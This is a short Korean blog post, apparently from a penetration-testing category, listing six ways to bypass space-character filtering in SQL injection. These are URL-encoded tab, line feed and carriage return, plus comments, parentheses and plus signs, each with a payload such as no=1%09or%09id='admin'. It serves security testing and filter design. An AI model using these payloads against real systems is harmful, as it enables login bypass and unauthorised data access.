반응형
출처 - http://binaryu.tistory.com/31
SQL Injection 공격시 공백 문자 필터링시 우회 방법
1. Tab : %09
- no=1%09or%09id='admin'
2. Line Feed (\n): %0a
- no=1%0aor%0aid='admin'
3. Carrage Return(\r) : %0d
- no=1%0dor%0did='admin'
4. 주석 : /**/
- no=1/**/or/**/id='admin'
5. 괄호 : ()
- no=(1)or(id='admin')
6. 더하기 : +
- no=1+or+id='admin'
반응형
'프로젝트 관련 조사 > 모의 해킹' 카테고리의 다른 글
| Open Redirect Cheat sheet (0) | 2016.11.16 |
|---|---|
| Advanced SQL Injection 공격사례 정리 (1) | 2016.11.01 |
| 웹에디터의 파일 업로드 취약점들 (0) | 2016.11.01 |
| Reflected File Download(RFD) Attack (0) | 2016.10.27 |
| Making XSS Keylogger(XSS Keylogger 만들기) (0) | 2016.10.27 |